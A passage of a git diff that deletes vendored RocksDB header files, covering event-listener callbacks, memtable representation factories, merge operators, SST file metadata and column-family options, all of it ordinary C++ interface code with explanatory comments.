-  // which will become a dangling pointer after the deletion.
-  virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) {
-  }
-
-  // A call-back function for RocksDB which will be called after an external
-  // file is ingested using IngestExternalFile.
-  //
-  // Note that the this function will run on the same thread as
-  // IngestExternalFile(), if this function is blocked, IngestExternalFile()
-  // will be blocked from finishing.
-  virtual void OnExternalFileIngested(
-      DB* /*db*/, const ExternalFileIngestionInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before setting the
-  // background error status to a non-OK value. The new background error status
-  // is provided in `bg_error` and can be modified by the callback. E.g., a
-  // callback can suppress errors by resetting it to Status::OK(), thus
-  // preventing the database from entering read-only mode. We do not provide any
-  // guarantee when failed flushes/compactions will be rescheduled if the user
-  // suppresses an error.
-  //
-  // Note that this function can run on the same threads as flush, compaction,
-  // and user writes. So, it is extremely important not to perform heavy
-  // computations or blocking calls in this function.
-  virtual void OnBackgroundError(BackgroundErrorReason /* reason */,
-                                 Status* /* bg_error */) {}
-
-  // Factory method to return CompactionEventListener. If multiple listeners
-  // provides CompactionEventListner, only the first one will be used.
-  virtual CompactionEventListener* GetCompactionEventListener() {
-    return nullptr;
-  }
-
-  virtual ~EventListener() {}
-};
-
-#else
-
-class EventListener {
-};
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/memtablerep.h b/thirdparty/rocksdb/include/rocksdb/memtablerep.h
deleted file mode 100644
index 347dd30..0000000
--- a/thirdparty/rocksdb/include/rocksdb/memtablerep.h
+++ /dev/null
@@ -1,353 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file contains the interface that must be implemented by any collection
-// to be used as the backing store for a MemTable. Such a collection must
-// satisfy the following properties:
-//  (1) It does not store duplicate items.
-//  (2) It uses MemTableRep::KeyComparator to compare items for iteration and
-//     equality.
-//  (3) It can be accessed concurrently by multiple readers and can support
-//     during reads. However, it needn't support multiple concurrent writes.
-//  (4) Items are never deleted.
-// The liberal use of assertions is encouraged to enforce (1).
-//
-// The factory will be passed an MemTableAllocator object when a new MemTableRep
-// is requested.
-//
-// Users can implement their own memtable representations. We include three
-// types built in:
-//  - SkipListRep: This is the default; it is backed by a skip list.
-//  - HashSkipListRep: The memtable rep that is best used for keys that are
-//  structured like "prefix:suffix" where iteration within a prefix is
-//  common and iteration across different prefixes is rare. It is backed by
-//  a hash map where each bucket is a skip list.
-//  - VectorRep: This is backed by an unordered std::vector. On iteration, the
-// vector is sorted. It is intelligent about sorting; once the MarkReadOnly()
-// has been called, the vector will only be sorted once. It is optimized for
-// random-write-heavy workloads.
-//
-// The last four implementations are designed for situations in which
-// iteration over the entire collection is rare since doing so requires all the
-// keys to be copied into a sorted data structure.
-
-#pragma once
-
-#include <memory>
-#include <stdexcept>
-#include <stdint.h>
-#include <stdlib.h>
-
-namespace rocksdb {
-
-class Arena;
-class Allocator;
-class LookupKey;
-class Slice;
-class SliceTransform;
-class Logger;
-
-typedef void* KeyHandle;
-
-class MemTableRep {
- public:
-  // KeyComparator provides a means to compare keys, which are internal keys
-  // concatenated with values.
-  class KeyComparator {
-   public:
-    // Compare a and b. Return a negative value if a is less than b, 0 if they
-    // are equal, and a positive value if a is greater than b
-    virtual int operator()(const char* prefix_len_key1,
-                           const char* prefix_len_key2) const = 0;
-
-    virtual int operator()(const char* prefix_len_key,
-                           const Slice& key) const = 0;
-
-    virtual ~KeyComparator() { }
-  };
-
-  explicit MemTableRep(Allocator* allocator) : allocator_(allocator) {}
-
-  // Allocate a buf of len size for storing key. The idea is that a
-  // specific memtable representation knows its underlying data structure
-  // better. By allowing it to allocate memory, it can possibly put
-  // correlated stuff in consecutive memory area to make processor
-  // prefetching more efficient.
-  virtual KeyHandle Allocate(const size_t len, char** buf);
-
-  // Insert key into the collection. (The caller will pack key and value into a
-  // single buffer and pass that in as the parameter to Insert).
-  // REQUIRES: nothing that compares equal to key is currently in the
-  // collection, and no concurrent modifications to the table in progress
-  virtual void Insert(KeyHandle handle) = 0;
-
-  // Same as Insert(), but in additional pass a hint to insert location for
-  // the key. If hint points to nullptr, a new hint will be populated.
-  // otherwise the hint will be updated to reflect the last insert location.
-  //
-  // Currently only skip-list based memtable implement the interface. Other
-  // implementations will fallback to Insert() by default.
-  virtual void InsertWithHint(KeyHandle handle, void** hint) {
-    // Ignore the hint by default.
-    Insert(handle);
-  }
-
-  // Like Insert(handle), but may be called concurrent with other calls
-  // to InsertConcurrently for other handles
-  virtual void InsertConcurrently(KeyHandle handle) {
-#ifndef ROCKSDB_LITE
-    throw std::runtime_error("concurrent insert not supported");
-#else
-    abort();
-#endif
-  }
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* key) const = 0;
-
-  // Notify this table rep that it will no longer be added to. By default,
-  // does nothing.  After MarkReadOnly() is called, this table rep will
-  // not be written to (ie No more calls to Allocate(), Insert(),
-  // or any writes done directly to entries accessed through the iterator.)
-  virtual void MarkReadOnly() { }
-
-  // Look up key from the mem table, since the first key in the mem table whose
-  // user_key matches the one given k, call the function callback_func(), with
-  // callback_args directly forwarded as the first parameter, and the mem table
-  // key as the second parameter. If the return value is false, then terminates.
-  // Otherwise, go through the next key.
-  //
-  // It's safe for Get() to terminate after having finished all the potential
-  // key for the k.user_key(), or not.
-  //
-  // Default:
-  // Get() function with a default value of dynamically construct an iterator,
-  // seek and call the call back function.
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg, const char* entry));
-
-  virtual uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                         const Slice& end_key) {
-    return 0;
-  }
-
-  // Report an approximation of how much memory has been used other than memory
-  // that was allocated through the allocator.  Safe to call from any thread.
-  virtual size_t ApproximateMemoryUsage() = 0;
-
-  virtual ~MemTableRep() { }
-
-  // Iteration over the contents of a skip collection
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() {}
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const = 0;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const = 0;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() = 0;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() = 0;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key, const char* memtable_key) = 0;
-
-    // retreat to the first entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) = 0;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() = 0;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() = 0;
-  };
-
-  // Return an iterator over the keys in this representation.
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  virtual Iterator* GetIterator(Arena* arena = nullptr) = 0;
-
-  // Return an iterator that has a special Seek semantics. The result of
-  // a Seek might only include keys with the same prefix as the target key.
-  // arena: If not null, the arena is used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  virtual Iterator* GetDynamicPrefixIterator(Arena* arena = nullptr) {
-    return GetIterator(arena);
-  }
-
-  // Return true if the current MemTableRep supports merge operator.
-  // Default: true
-  virtual bool IsMergeOperatorSupported() const { return true; }
-
-  // Return true if the current MemTableRep supports snapshot
-  // Default: true
-  virtual bool IsSnapshotSupported() const { return true; }
-
- protected:
-  // When *key is an internal key concatenated with the value, returns the
-  // user key.
-  virtual Slice UserKey(const char* key) const;
-
-  Allocator* allocator_;
-};
-
-// This is the base class for all factories that are used by RocksDB to create
-// new MemTableRep objects
-class MemTableRepFactory {
- public:
-  virtual ~MemTableRepFactory() {}
-
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) = 0;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& key_cmp, Allocator* allocator,
-      const SliceTransform* slice_transform, Logger* logger,
-      uint32_t /* column_family_id */) {
-    return CreateMemTableRep(key_cmp, allocator, slice_transform, logger);
-  }
-
-  virtual const char* Name() const = 0;
-
-  // Return true if the current MemTableRep supports concurrent inserts
-  // Default: false
-  virtual bool IsInsertConcurrentlySupported() const { return false; }
-};
-
-// This uses a skip list to store keys. It is the default.
-//
-// Parameters:
-//   lookahead: If non-zero, each iterator's seek operation will start the
-//     search from the previously visited record (doing at most 'lookahead'
-//     steps). This is an optimization for the access pattern including many
-//     seeks with consecutive keys.
-class SkipListFactory : public MemTableRepFactory {
- public:
-  explicit SkipListFactory(size_t lookahead = 0) : lookahead_(lookahead) {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) override;
-  virtual const char* Name() const override { return "SkipListFactory"; }
-
-  bool IsInsertConcurrentlySupported() const override { return true; }
-
- private:
-  const size_t lookahead_;
-};
-
-#ifndef ROCKSDB_LITE
-// This creates MemTableReps that are backed by an std::vector. On iteration,
-// the vector is sorted. This is useful for workloads where iteration is very
-// rare and writes are generally not issued after reads begin.
-//
-// Parameters:
-//   count: Passed to the constructor of the underlying std::vector of each
-//     VectorRep. On initialization, the underlying array will be at least count
-//     bytes reserved for usage.
-class VectorRepFactory : public MemTableRepFactory {
-  const size_t count_;
-
- public:
-  explicit VectorRepFactory(size_t count = 0) : count_(count) { }
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "VectorRepFactory";
-  }
-};
-
-// This class contains a fixed array of buckets, each
-// pointing to a skiplist (null if the bucket is empty).
-// bucket_count: number of fixed array buckets
-// skiplist_height: the max height of the skiplist
-// skiplist_branching_factor: probabilistic size ratio between adjacent
-//                            link lists in the skiplist
-extern MemTableRepFactory* NewHashSkipListRepFactory(
-    size_t bucket_count = 1000000, int32_t skiplist_height = 4,
-    int32_t skiplist_branching_factor = 4
-);
-
-// The factory is to create memtables based on a hash table:
-// it contains a fixed array of buckets, each pointing to either a linked list
-// or a skip list if number of entries inside the bucket exceeds
-// threshold_use_skiplist.
-// @bucket_count: number of fixed array buckets
-// @huge_page_tlb_size: if <=0, allocate the hash table bytes from malloc.
-//                      Otherwise from huge page TLB. The user needs to reserve
-//                      huge pages for it to be allocated, like:
-//                          sysctl -w vm.nr_hugepages=20
-//                      See linux doc Documentation/vm/hugetlbpage.txt
-// @bucket_entries_logging_threshold: if number of entries in one bucket
-//                                    exceeds this number, log about it.
-// @if_log_bucket_dist_when_flash: if true, log distribution of number of
-//                                 entries when flushing.
-// @threshold_use_skiplist: a bucket switches to skip list if number of
-//                          entries exceed this parameter.
-extern MemTableRepFactory* NewHashLinkListRepFactory(
-    size_t bucket_count = 50000, size_t huge_page_tlb_size = 0,
-    int bucket_entries_logging_threshold = 4096,
-    bool if_log_bucket_dist_when_flash = true,
-    uint32_t threshold_use_skiplist = 256);
-
-// This factory creates a cuckoo-hashing based mem-table representation.
-// Cuckoo-hash is a closed-hash strategy, in which all key/value pairs
-// are stored in the bucket array itself intead of in some data structures
-// external to the bucket array.  In addition, each key in cuckoo hash
-// has a constant number of possible buckets in the bucket array.  These
-// two properties together makes cuckoo hash more memory efficient and
-// a constant worst-case read time.  Cuckoo hash is best suitable for
-// point-lookup workload.
-//
-// When inserting a key / value, it first checks whether one of its possible
-// buckets is empty.  If so, the key / value will be inserted to that vacant
-// bucket.  Otherwise, one of the keys originally stored in one of these
-// possible buckets will be "kicked out" and move to one of its possible
-// buckets (and possibly kicks out another victim.)  In the current
-// implementation, such "kick-out" path is bounded.  If it cannot find a
-// "kick-out" path for a specific key, this key will be stored in a backup
-// structure, and the current memtable to be forced to immutable.
-//
-// Note that currently this mem-table representation does not support
-// snapshot (i.e., it only queries latest state) and iterators.  In addition,
-// MultiGet operation might also lose its atomicity due to the lack of
-// snapshot support.
-//
-// Parameters:
-//   write_buffer_size: the write buffer size in bytes.
-//   average_data_size: the average size of key + value in bytes.  This value
-//     together with write_buffer_size will be used to compute the number
-//     of buckets.
-//   hash_function_count: the number of hash functions that will be used by
-//     the cuckoo-hash.  The number also equals to the number of possible
-//     buckets each key will have.
-extern MemTableRepFactory* NewHashCuckooRepFactory(
-    size_t write_buffer_size, size_t average_data_size = 64,
-    unsigned int hash_function_count = 4);
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/merge_operator.h b/thirdparty/rocksdb/include/rocksdb/merge_operator.h
deleted file mode 100644
index f294710..0000000
--- a/thirdparty/rocksdb/include/rocksdb/merge_operator.h
+++ /dev/null
@@ -1,232 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
-
-#include <deque>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class Slice;
-class Logger;
-
-// The Merge Operator
-//
-// Essentially, a MergeOperator specifies the SEMANTICS of a merge, which only
-// client knows. It could be numeric addition, list append, string
-// concatenation, edit data structure, ... , anything.
-// The library, on the other hand, is concerned with the exercise of this
-// interface, at the right time (during get, iteration, compaction...)
-//
-// To use merge, the client needs to provide an object implementing one of
-// the following interfaces:
-//  a) AssociativeMergeOperator - for most simple semantics (always take
-//    two values, and merge them into one value, which is then put back
-//    into rocksdb); numeric addition and string concatenation are examples;
-//
-//  b) MergeOperator - the generic class for all the more abstract / complex
-//    operations; one method (FullMergeV2) to merge a Put/Delete value with a
-//    merge operand; and another method (PartialMerge) that merges multiple
-//    operands together. this is especially useful if your key values have
-//    complex structures but you would still like to support client-specific
-//    incremental updates.
-//
-// AssociativeMergeOperator is simpler to implement. MergeOperator is simply
-// more powerful.
-//
-// Refer to rocksdb-merge wiki for more details and example implementations.
-//
-class MergeOperator {
- public:
-  virtual ~MergeOperator() {}
-
-  // Gives the client a way to express the read -> modify -> write semantics
-  // key:      (IN)    The key that's associated with this merge operation.
-  //                   Client could multiplex the merge operator based on it
-  //                   if the key space is partitioned and different subspaces
-  //                   refer to different types of data which have different
-  //                   merge operation semantics
-  // existing: (IN)    null indicates that the key does not exist before this op
-  // operand_list:(IN) the sequence of merge operations to apply, front() first.
-  // new_value:(OUT)   Client is responsible for filling the merge result here.
-  // The string that new_value is pointing to will be empty.
-  // logger:   (IN)    Client could use this to log errors during merge.
-  //
-  // Return true on success.
-  // All values passed in will be client-specific values. So if this method
-  // returns false, it is because client specified bad data or there was
-  // internal corruption. This will be treated as an error by the library.
-  //
-  // Also make use of the *logger for error messages.
-  virtual bool FullMerge(const Slice& key,
-                         const Slice* existing_value,
-                         const std::deque<std::string>& operand_list,
-                         std::string* new_value,
-                         Logger* logger) const {
-    // deprecated, please use FullMergeV2()
-    assert(false);
-    return false;
-  }
-
-  struct MergeOperationInput {
-    explicit MergeOperationInput(const Slice& _key,
-                                 const Slice* _existing_value,
-                                 const std::vector<Slice>& _operand_list,
-                                 Logger* _logger)
-        : key(_key),
-          existing_value(_existing_value),
-          operand_list(_operand_list),
-          logger(_logger) {}
-
-    // The key associated with the merge operation.
-    const Slice& key;
-    // The existing value of the current key, nullptr means that the
-    // value dont exist.
-    const Slice* existing_value;
-    // A list of operands to apply.
-    const std::vector<Slice>& operand_list;
-    // Logger could be used by client to log any errors that happen during
-    // the merge operation.
-    Logger* logger;
-  };
-
-  struct MergeOperationOutput {
-    explicit MergeOperationOutput(std::string& _new_value,
-                                  Slice& _existing_operand)
-        : new_value(_new_value), existing_operand(_existing_operand) {}
-
-    // Client is responsible for filling the merge result here.
-    std::string& new_value;
-    // If the merge result is one of the existing operands (or existing_value),
-    // client can set this field to the operand (or existing_value) instead of
-    // using new_value.
-    Slice& existing_operand;
-  };
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const;
-
-  // This function performs merge(left_op, right_op)
-  // when both the operands are themselves merge operation types
-  // that you would have passed to a DB::Merge() call in the same order
-  // (i.e.: DB::Merge(key,left_op), followed by DB::Merge(key,right_op)).
-  //
-  // PartialMerge should combine them into a single merge operation that is
-  // saved into *new_value, and then it should return true.
-  // *new_value should be constructed such that a call to
-  // DB::Merge(key, *new_value) would yield the same result as a call
-  // to DB::Merge(key, left_op) followed by DB::Merge(key, right_op).
-  //
-  // The string that new_value is pointing to will be empty.
-  //
-  // The default implementation of PartialMergeMulti will use this function
-  // as a helper, for backward compatibility.  Any successor class of
-  // MergeOperator should either implement PartialMerge or PartialMergeMulti,
-  // although implementing PartialMergeMulti is suggested as it is in general
-  // more effective to merge multiple operands at a time instead of two
-  // operands at a time.
-  //
-  // If it is impossible or infeasible to combine the two operations,
-  // leave new_value unchanged and return false. The library will
-  // internally keep track of the operations, and apply them in the
-  // correct order once a base-value (a Put/Delete/End-of-Database) is seen.
-  //
-  // TODO: Presently there is no way to differentiate between error/corruption
-  // and simply "return false". For now, the client should simply return
-  // false in any case it cannot perform partial-merge, regardless of reason.
-  // If there is corruption in the data, handle it in the FullMergeV2() function
-  // and return false there.  The default implementation of PartialMerge will
-  // always return false.
-  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
-                            const Slice& right_operand, std::string* new_value,
-                            Logger* logger) const {
-    return false;
-  }
-
-  // This function performs merge when all the operands are themselves merge
-  // operation types that you would have passed to a DB::Merge() call in the
-  // same order (front() first)
-  // (i.e. DB::Merge(key, operand_list[0]), followed by
-  //  DB::Merge(key, operand_list[1]), ...)
-  //
-  // PartialMergeMulti should combine them into a single merge operation that is
-  // saved into *new_value, and then it should return true.  *new_value should
-  // be constructed such that a call to DB::Merge(key, *new_value) would yield
-  // the same result as subquential individual calls to DB::Merge(key, operand)
-  // for each operand in operand_list from front() to back().
-  //
-  // The string that new_value is pointing to will be empty.
-  //
-  // The PartialMergeMulti function will be called when there are at least two
-  // operands.
-  //
-  // In the default implementation, PartialMergeMulti will invoke PartialMerge
-  // multiple times, where each time it only merges two operands.  Developers
-  // should either implement PartialMergeMulti, or implement PartialMerge which
-  // is served as the helper function of the default PartialMergeMulti.
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const;
-
-  // The name of the MergeOperator. Used to check for MergeOperator
-  // mismatches (i.e., a DB created with one MergeOperator is
-  // accessed using a different MergeOperator)
-  // TODO: the name is currently not stored persistently and thus
-  //       no checking is enforced. Client is responsible for providing
-  //       consistent MergeOperator between DB opens.
-  virtual const char* Name() const = 0;
-
-  // Determines whether the MergeOperator can be called with just a single
-  // merge operand.
-  // Override and return true for allowing a single operand. FullMergeV2 and
-  // PartialMerge/PartialMergeMulti should be implemented accordingly to handle
-  // a single operand.
-  virtual bool AllowSingleOperand() const { return false; }
-};
-
-// The simpler, associative merge operator.
-class AssociativeMergeOperator : public MergeOperator {
- public:
-  ~AssociativeMergeOperator() override {}
-
-  // Gives the client a way to express the read -> modify -> write semantics
-  // key:           (IN) The key that's associated with this merge operation.
-  // existing_value:(IN) null indicates the key does not exist before this op
-  // value:         (IN) the value to update/merge the existing_value with
-  // new_value:    (OUT) Client is responsible for filling the merge result
-  // here. The string that new_value is pointing to will be empty.
-  // logger:        (IN) Client could use this to log errors during merge.
-  //
-  // Return true on success.
-  // All values passed in will be client-specific values. So if this method
-  // returns false, it is because client specified bad data or there was
-  // internal corruption. The client should assume that this will be treated
-  // as an error by the library.
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const = 0;
-
-
- private:
-  // Default implementations of the MergeOperator functions
-  bool FullMergeV2(const MergeOperationInput& merge_in,
-                   MergeOperationOutput* merge_out) const override;
-
-  bool PartialMerge(const Slice& key, const Slice& left_operand,
-                    const Slice& right_operand, std::string* new_value,
-                    Logger* logger) const override;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/metadata.h b/thirdparty/rocksdb/include/rocksdb/metadata.h
deleted file mode 100644
index 37e7b50..0000000
--- a/thirdparty/rocksdb/include/rocksdb/metadata.h
+++ /dev/null
@@ -1,94 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-struct ColumnFamilyMetaData;
-struct LevelMetaData;
-struct SstFileMetaData;
-
-// The metadata that describes a column family.
-struct ColumnFamilyMetaData {
-  ColumnFamilyMetaData() : size(0), name("") {}
-  ColumnFamilyMetaData(const std::string& _name, uint64_t _size,
-                       const std::vector<LevelMetaData>&& _levels) :
-      size(_size), name(_name), levels(_levels) {}
-
-  // The size of this column family in bytes, which is equal to the sum of
-  // the file size of its "levels".
-  uint64_t size;
-  // The number of files in this column family.
-  size_t file_count;
-  // The name of the column family.
-  std::string name;
-  // The metadata of all levels in this column family.
-  std::vector<LevelMetaData> levels;
-};
-
-// The metadata that describes a level.
-struct LevelMetaData {
-  LevelMetaData(int _level, uint64_t _size,
-                const std::vector<SstFileMetaData>&& _files) :
-      level(_level), size(_size),
-      files(_files) {}
-
-  // The level which this meta data describes.
-  const int level;
-  // The size of this level in bytes, which is equal to the sum of
-  // the file size of its "files".
-  const uint64_t size;
-  // The metadata of all sst files in this level.
-  const std::vector<SstFileMetaData> files;
-};
-
-// The metadata that describes a SST file.
-struct SstFileMetaData {
-  SstFileMetaData() {}
-  SstFileMetaData(const std::string& _file_name, const std::string& _path,
-                  uint64_t _size, SequenceNumber _smallest_seqno,
-                  SequenceNumber _largest_seqno,
-                  const std::string& _smallestkey,
-                  const std::string& _largestkey, uint64_t _num_reads_sampled,
-                  bool _being_compacted)
-      : size(_size),
-        name(_file_name),
-        db_path(_path),
-        smallest_seqno(_smallest_seqno),
-        largest_seqno(_largest_seqno),
-        smallestkey(_smallestkey),
-        largestkey(_largestkey),
-        num_reads_sampled(_num_reads_sampled),
-        being_compacted(_being_compacted) {}
-
-  // File size in bytes.
-  uint64_t size;
-  // The name of the file.
-  std::string name;
-  // The full path where the file locates.
-  std::string db_path;
-
-  SequenceNumber smallest_seqno;  // Smallest sequence number in file.
-  SequenceNumber largest_seqno;   // Largest sequence number in file.
-  std::string smallestkey;     // Smallest user defined key in the file.
-  std::string largestkey;      // Largest user defined key in the file.
-  uint64_t num_reads_sampled;  // How many times the file is read.
-  bool being_compacted;  // true if the file is currently being compacted.
-};
-
-// The full set of metadata associated with each SST file.
-struct LiveFileMetaData : SstFileMetaData {
-  std::string column_family_name;  // Name of the column family
-  int level;               // Level at which this file resides.
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/options.h b/thirdparty/rocksdb/include/rocksdb/options.h
deleted file mode 100644
index 4d2f143..0000000
--- a/thirdparty/rocksdb/include/rocksdb/options.h
+++ /dev/null
@@ -1,1196 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
-#define STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
-
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <memory>
-#include <vector>
-#include <limits>
-#include <unordered_map>
-
-#include "rocksdb/advanced_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/universal_compaction.h"
-#include "rocksdb/version.h"
-#include "rocksdb/write_buffer_manager.h"
-
-#ifdef max
-#undef max
-#endif
-
-namespace rocksdb {
-
-class Cache;
-class CompactionFilter;
-class CompactionFilterFactory;
-class Comparator;
-class Env;
-enum InfoLogLevel : unsigned char;
-class SstFileManager;
-class FilterPolicy;
-class Logger;
-class MergeOperator;
-class Snapshot;
-class MemTableRepFactory;
-class RateLimiter;
-class Slice;
-class Statistics;
-class InternalKeyComparator;
-class WalFilter;
-
-// DB contents are stored in a set of blocks, each of which holds a
-// sequence of key,value pairs.  Each block may be compressed before
-// being stored in a file.  The following enum describes which
-// compression method (if any) is used to compress a block.
-enum CompressionType : unsigned char {
-  // NOTE: do not change the values of existing entries, as these are
-  // part of the persistent format on disk.
-  kNoCompression = 0x0,
-  kSnappyCompression = 0x1,
-  kZlibCompression = 0x2,
-  kBZip2Compression = 0x3,
-  kLZ4Compression = 0x4,
-  kLZ4HCCompression = 0x5,
-  kXpressCompression = 0x6,
-  kZSTD = 0x7,
-
-  // Only use kZSTDNotFinalCompression if you have to use ZSTD lib older than
-  // 0.8.0 or consider a possibility of downgrading the service or copying
-  // the database files to another service running with an older version of
-  // RocksDB that doesn't have kZSTD. Otherwise, you should use kZSTD. We will
-  // eventually remove the option from the public API.
-  kZSTDNotFinalCompression = 0x40,
-
-  // kDisableCompressionOption is used to disable some compression options.
-  kDisableCompressionOption = 0xff,
-};
-
-struct Options;
-
-struct ColumnFamilyOptions : public AdvancedColumnFamilyOptions {
-  // The function recovers options to a previous version. Only 4.6 or later
-  // versions are supported.
-  ColumnFamilyOptions* OldDefaults(int rocksdb_major_version = 4,
-                                   int rocksdb_minor_version = 6);
-
-  // Some functions that make it easier to optimize RocksDB
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  ColumnFamilyOptions* OptimizeForSmallDb();
-
-  // Use this if you don't need to keep the data sorted, i.e. you'll never use
-  // an iterator, only Put() and Get() API calls
-  //
-  // Not supported in ROCKSDB_LITE
-  ColumnFamilyOptions* OptimizeForPointLookup(
-      uint64_t block_cache_size_mb);
-
-  // Default values for some parameters in ColumnFamilyOptions are not
-  // optimized for heavy workloads and big datasets, which means you might
-  // observe write stalls under some conditions. As a starting point for tuning
-  // RocksDB options, use the following two functions:
-  // * OptimizeLevelStyleCompaction -- optimizes level style compaction
-  // * OptimizeUniversalStyleCompaction -- optimizes universal style compaction
-  // Universal style compaction is focused on reducing Write Amplification
-  // Factor for big data sets, but increases Space Amplification. You can learn
-  // more about the different styles here:
-  // https://github.com/facebook/rocksdb/wiki/Rocksdb-Architecture-Guide
-  // Make sure to also call IncreaseParallelism(), which will provide the
-  // biggest performance gains.
-  // Note: we might use more memory than memtable_memory_budget during high
-  // write rate period
-  //
-  // OptimizeUniversalStyleCompaction is not supported in ROCKSDB_LITE
-  ColumnFamilyOptions* OptimizeLevelStyleCompaction(
-      uint64_t memtable_memory_budget = 512 * 1024 * 1024);
-  ColumnFamilyOptions* OptimizeUniversalStyleCompaction(
-      uint64_t memtable_memory_budget = 512 * 1024 * 1024);
-
-  // -------------------
-  // Parameters that affect behavior
-
-  // Comparator used to define the order of keys in the table.
-  // Default: a comparator that uses lexicographic byte-wise ordering
-  //
-  // REQUIRES: The client must ensure that the comparator supplied
-  // here has the same name and orders keys *exactly* the same as the
-  // comparator provided to previous open calls on the same DB.
-  const Comparator* comparator = BytewiseComparator();
-
-  // REQUIRES: The client must provide a merge operator if Merge operation
-  // needs to be accessed. Calling Merge on a DB without a merge operator
-  // would result in Status::NotSupported. The client must ensure that the
-  // merge operator supplied here has the same name and *exactly* the same
-  // semantics as the merge operator provided to previous open calls on
-  // the same DB. The only exception is reserved for upgrade, where a DB
-  // previously without a merge operator is introduced to Merge operation
-  // for the first time. It's necessary to specify a merge operator when
-  // opening the DB in this case.
-  // Default: nullptr
-  std::shared_ptr<MergeOperator> merge_operator = nullptr;
-
-  // A single CompactionFilter instance to call into during compaction.
-  // Allows an application to modify/delete a key-value during background
-  // compaction.
-  //
-  // If the client requires a new compaction filter to be used for different
-  // compaction runs, it can specify compaction_filter_factory instead of this
-  // option.  The client should specify only one of the two.
-  // compaction_filter takes precedence over compaction_filter_factory if
-  // client specifies both.
-  //
-  // If multithreaded compaction is being used, the supplied CompactionFilter
-  // instance may be used from different threads concurrently and so should be
-  // thread-safe.
-  //
-  // Default: nullptr
-  const CompactionFilter* compaction_filter = nullptr;
-
-  // This is a factory that provides compaction filter objects which allow
-  // an application to modify/delete a key-value during background compaction.
-  //
-  // A new filter will be created on each compaction run.  If multithreaded
-  // compaction is being used, each created CompactionFilter will only be used
